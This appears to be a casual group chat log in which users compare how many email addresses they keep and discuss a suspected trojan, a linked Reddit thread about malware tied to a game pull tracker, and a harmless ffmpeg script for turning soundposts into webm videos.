I just read if you paid Linux enough money, you could get email@linux.com
i have a "personal" one for signups for games/forums/whatever, an "official" one with my name that i use "professionally", a gmail because google and a "shitpost" mail i use whereever i dont want to use one of the others
you might be interested
i already saw enough on this post
https://www.reddit.com/r/Endfield/comments/1rjx5v6/endfieldrecords_dot_com_pull_tracker_malware/
I used to join Google Learn to Earn for their merchs, so I need new email for almost every different event 
imagine being like me one for ads and for plugins
one professional
one for alias use

Been trying to track it down so far, I found a trojan virus, I constantly run full scan at my pc since that issue was released to the public. I know some malware only run when the device is turned off. But meh still planning on investigating this malware instead of wiping my pc
i havent read all of the reddit post but it does seem to have some info on checking and removing, not sure if thats more "current" than what people here have been saying. but i think it should be removable without having to reinstall windows
imagine someone uses you to be able to crack your system's ring -2
it doesnt seem very sophisticated
Well ig for now I'll just start reinstalling and manage all of my accounts who's connected to corresponding apps
it isn't until I say ring -2 means full control unless you plug power off completely
no im talking about the endfield thing specifically
oh I thought you replied to mme sry xD
all good
question, this coding is on Javascript am I right?
powershell
No
I still doubt it isn't the malware. Its either I clicked on some dumb founded website that injected trojan into my pc despite me having malwarebytes run 24/7 and windows security I found this
no
its a ps1 scipt
these ones?
ps1 is powershell
oh
If it's .js I would be able to read it
check the details on what file its supposed to be. defender does do a lot of false positives
if it's js it looks very cpp-ish and has const let var instead of solid types and struct

if it was .js i would have projectile vomited at line 5
not yet familiar with ps1 but good to know
spooky~
eeeeeewwwwww
they even ffmpeg recording
no thats one of mine actually
oh
what the hell is that

I can read it so it must be a common stuff
It was a zip file, It's probably from an ad that some website forces you to click but yeah thanks
its for converting 4chan soundposts into webm with audio...
filename[sound=audiofile.mp4].webm
its grabs the audiofile and ffmpegs it onto the video
I'm not familiar with 4chan sadly
oh

ive been there for specialized topics for over two decades and im not going to stop
nerd over nerds

never call a helpful nerd nerd unless uwanna get hacked boyo
and a nerd of nerd is properly nerded of knowing nerds and their doing

i made that script when vtubers got big because none of the boards that talked about them had audio webm support so it was all soundposts and i wanted to repost them elsewhere
That's cool
I have been doing cpu optimizations all day

